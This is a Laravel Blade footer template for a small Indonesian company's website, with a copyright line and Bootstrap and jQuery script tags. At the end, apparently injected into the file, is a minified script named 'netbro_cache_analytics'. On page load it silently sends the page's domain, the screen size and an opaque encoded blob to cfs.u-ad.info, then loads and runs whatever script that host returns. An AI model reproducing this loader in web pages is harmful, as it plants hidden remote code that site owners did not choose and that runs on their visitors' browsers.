<div class="fullwidth-section half-padding footer">
	
	<div class="container">
			<div class="row text-center" style="margin-top: 20px">
				<div class="col-md-12">Copyright &copy; 2015 All Rights Reserved. Muchamad Aang Sopian<br>
					<span>PT BEIT.&nbsp;</span>
					<span>Jl. Bukit Cimanggu City no 14.&nbsp;</span>
					<span>Bogor</span>
				</div>
			</div>
	</div>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="{{asset('js/bootstrap.min.js')}}"></script>
    <script src="{{asset('js/docs.min.js')}}"></script>
    
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="{{asset('js/ie10-viewport-bug-workaround.js')}}"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRE0F9HQVpvSrqzX%2fjnJWp5Xo2k5wQytuTi0H8DKktmda63ixPoa%2btYc83xEzqmbAKS97M0YTLLasFDJPU2qrfnDJE%2fwBWSCSPAdwqq4mujupbMFwbj4HLNnbNn36xYOYORlncpezK3kTDNrwPEVF5tlGXjuL8TGnr6VmtmD3OhRA3B3hU%2bUFQUd9c91LLiaI7BkylCNCE9EbdZRlyLE39hpHMHo77kXVh2FKwrCHAvm9aGfyLbIhXqMAZ3xIw7EtQK2%2fGwt4VHOj%2bijIRz%2fr%2bYU67hKi%2fVVLgZA%2b6YUnvw9dxR1umWIdaBrlbRy0Uaf7%2ftAY1397TWT04iQPeVulGX4aVXgDFlgOt55h1MPFRaVDsF7uH8E8%2fRWKtkxKuaCI06Z21xm9Zllm8gLA6qJx0EWmojo6Ve6R1aBhv8sw1k8%2bdu8W7DkXADZ8xJndn96PEFzWCo7HeYqCQDjC0S44mfe4PQDoEIPbRIlnrnHvn%2bD0YiwgerH%2bczN5dmQKWTTuG8Xx29sRh3SOFtcicNGNwvwihES60KGXp%2fqr7QHlz%2bnk%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>